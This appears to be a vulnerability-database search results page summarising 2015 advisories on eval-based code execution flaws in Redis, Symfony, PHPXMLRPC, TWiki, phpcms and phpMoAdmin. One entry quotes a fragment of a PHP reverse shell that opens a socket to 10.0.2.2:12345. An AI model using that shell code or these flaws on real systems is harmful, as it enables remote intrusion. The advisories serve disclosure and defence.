Lucene search
K

2514 matches found

RedHat Linux
RedHat Linux
added 2015/08/24 8:17 p.m.2 views

redis: Lua sandbox escape and arbitrary code execution

A flaw was discovered in redis that could allow an authenticated user, who was able to use the EVAL command to run Lua code, to break out of the Lua sandbox and execute arbitrary code on the system...

10CVSS6.2AI score0.09636EPSS
Exploits2References4
Exploit DB
Exploit DB
added 2015/07/02 12:0 a.m.86 views

PHPXMLRPC < 1.1 - Remote Code Execution

PHPXMLRPC Remote Code Execution Vendor: Useful Information Inc. Product: PHPXMLRPC Version: = 1.1 Website: http://phpxmlrpc.sourceforge.net/ BID: 14088 CVE: CVE-2005-1921 OSVDB: 17793 SECUNIA: 15852 PACKETSTORM: 38394 Description: PHPXMLRPC aka XML-RPC For PHP is a PHP implementation of the XML-R...

7.5CVSS6.5AI score0.79071EPSS
Exploits5
NVD
NVD
added 2015/06/24 10:59 a.m.20 views

CVE-2015-2308

Eval injection vulnerability in the HttpCache class in HttpKernel in Symfony 2.x before 2.3.27, 2.4.x and 2.5.x before 2.5.11, and 2.6.x before 2.6.6 allows remote attackers to execute arbitrary PHP code via a language="php" attribute of a SCRIPT element...

6.8CVSS7.6AI score0.01365EPSS
Exploits0References4
OSV
OSV
added 2015/06/24 10:59 a.m.10 views

CVE-2015-2308

Eval injection vulnerability in the HttpCache class in HttpKernel in Symfony 2.x before 2.3.27, 2.4.x and 2.5.x before 2.5.11, and 2.6.x before 2.6.6 allows remote attackers to execute arbitrary PHP code via a language="php" attribute of a SCRIPT element...

6.8CVSS7.5AI score0.01365EPSS
Exploits0References5
OSV
OSV
added 2015/06/24 10:59 a.m.1 views

UBUNTU-CVE-2015-2308

Eval injection vulnerability in the HttpCache class in HttpKernel in Symfony 2.x before 2.3.27, 2.4.x and 2.5.x before 2.5.11, and 2.6.x before 2.6.6 allows remote attackers to execute arbitrary PHP code via a language="php" attribute of a SCRIPT element...

6.8CVSS6.1AI score0.01365EPSS
Exploits0References2
Prion
Prion
added 2015/06/24 10:59 a.m.21 views

Sql injection

Eval injection vulnerability in the HttpCache class in HttpKernel in Symfony 2.x before 2.3.27, 2.4.x and 2.5.x before 2.5.11, and 2.6.x before 2.6.6 allows remote attackers to execute arbitrary PHP code via a language="php" attribute of a SCRIPT element...

6.8CVSS8.1AI score0.01365EPSS
Exploits0References4Affected Software1
Cvelist
Cvelist
added 2015/06/24 10:0 a.m.33 views

CVE-2015-2308

Eval injection vulnerability in the HttpCache class in HttpKernel in Symfony 2.x before 2.3.27, 2.4.x and 2.5.x before 2.5.11, and 2.6.x before 2.6.6 allows remote attackers to execute arbitrary PHP code via a language="php" attribute of a SCRIPT element...

7.4AI score0.01365EPSS
Exploits0References4
CVE
CVE
added 2015/06/24 10:0 a.m.82 views

CVE-2015-2308

Symfony 2.x vulnerable to PHP code execution via HTTP cache HttpCache Eval injection. Affected: HttpKernel HttpCache class when ESI is enabled. Root cause: language="php" attribute in SCRIPT elements not escaped before eval(). Affected versions: Symfony 2.0.x–2.6.x with fixes in 2.3.27, 2.5.11, a...

6.8CVSS7.6AI score0.01365EPSS
Exploits0References4Affected Software1
CNVD
CNVD
added 2015/06/10 12:0 a.m.3 views

Redis EVAL Lua Sandbox Security Bypass Vulnerability

Redis is an open source memory-based and key-value pair storage the simplest form of database organization database system. Redis has a security vulnerability that allows a remote attacker to bypass certain security restrictions by submitting a special eval command to execute arbitrary Lua byteco...

10CVSS7.7AI score0.09636EPSS
Exploits2References1
OSV
OSV
added 2015/06/09 2:59 p.m.3 views

DEBIAN-CVE-2015-4335

Redis before 2.8.21 and 3.x before 3.0.2 allows remote attackers to execute arbitrary Lua bytecode via the eval command...

10CVSS7.6AI score0.09636EPSS
Exploits2References1
OSV
OSV
added 2015/06/09 2:59 p.m.7 views

AZL-44232 CVE-2015-4335 affecting package compat-lua 5.1.5-17

Redis before 2.8.21 and 3.x before 3.0.2 allows remote attackers to execute arbitrary Lua bytecode via the eval command...

10CVSS6.7AI score0.09636EPSS
Exploits2References1
UbuntuCve
UbuntuCve
added 2015/06/09 2:59 p.m.39 views

CVE-2015-4335

Redis before 2.8.21 and 3.x before 3.0.2 allows remote attackers to execute arbitrary Lua bytecode via the eval command...

10CVSS6.6AI score0.09636EPSS
Exploits2References3
OSV
OSV
added 2015/06/09 2:59 p.m.3 views

UBUNTU-CVE-2015-4335

Redis before 2.8.21 and 3.x before 3.0.2 allows remote attackers to execute arbitrary Lua bytecode via the eval command...

10CVSS6.7AI score0.09636EPSS
Exploits2References4
CVE
CVE
added 2015/06/09 2:0 p.m.157 views

CVE-2015-4335

CVE-2015-4335: Redis EVAL Lua sandbox escape . The vulnerability affects Redis up to 2.8.21 and 3.x up to 3.0.2, where remote attackers could abuse the EVAL Lua command to execute arbitrary Lua bytecode, potentially escaping the sandbox and running code with Redis process privileges. Debian’s adv...

10CVSS7AI score0.09636EPSS
In wildExploits2References13Affected Software1
Tenable Nessus
Tenable Nessus
added 2015/06/09 12:0 a.m.35 views

FreeBSD : redis -- EVAL Lua Sandbox Escape (838fa84a-0e25-11e5-90e4-d050996490d0)

Ben Murphy reports : It is possible to break out of the Lua sandbox in Redis and execute arbitrary code. This shouldn't pose a threat to users under the trusted Redis security model where only trusted users can connect to the database. However, in real deployments there could be databases that ca...

10CVSS5.7AI score0.09636EPSS
Exploits2References3
OSV
OSV
added 2015/06/06 12:0 a.m.32 views

DSA-3279-1 redis - security update

Bulletin has no description...

10CVSS6.2AI score0.09636EPSS
Exploits2
myhack58
myhack58
added 2015/04/23 12:0 a.m.16 views

phpcms front Desk arbitrary code execution php must be less than 5. 3-the vulnerabilities and early warning-the black bar safety net

phpcms v9 string2arrayfunction using the eval function,in more than one place may cause code execution vulnerability /phpssoserver/phpcms/libs/functions/global.func.php | 1 2 3 4 5 6 7 8 9 1 0 1 1 | / Converts a string to an array @param string $data the string @return array returns the array...

2.7AI score
Exploits0
rdot
rdot
added 2015/04/08 12:0 a.m.819 views

PHP reverse eval shell

Сделан для прокидывания через RCE при ограничениях exec и подобному. Использует только fsockopen и eval Форкается если есть pcntlfork PHP код: settimelimit0; if functionexistspcntlfork $pid = pcntlfork; if$pid==1 exit1; if$pid exit0; ifposixsetsid==1 exit1; $sock = fsockopen'10.0.2.2',12345,...

1.7AI score
Exploits0
0day.today
0day.today
added 2015/03/19 12:0 a.m.54 views

TWiki Debugenableplugins Remote Code Execution Exploit

TWiki versions 4.0.x through 6.0.0 contain a vulnerability in the Debug functionality. The value of the debugenableplugins parameter is used without proper sanitization in an Perl eval statement which allows remote code execution. This module requires Metasploit: http://metasploit.com/download...

0.2AI score0.55637EPSS
Exploits12
myhack58
myhack58
added 2015/03/19 12:0 a.m.22 views

MongoDB management tool exposure remote code execution vulnerability-vulnerability warning-the black bar safety net

MongoDB, the IT sector mainstream non-relational database NoSQL platform is one that is based on a table of a relational database of the popular alternatives. Recently, the management for MongoDB is a GUI tool phpMoAdmin is the storm has a very serious security vulnerability, once exploited, this...

0.1AI score
Exploits0
Rows per page
Query Builder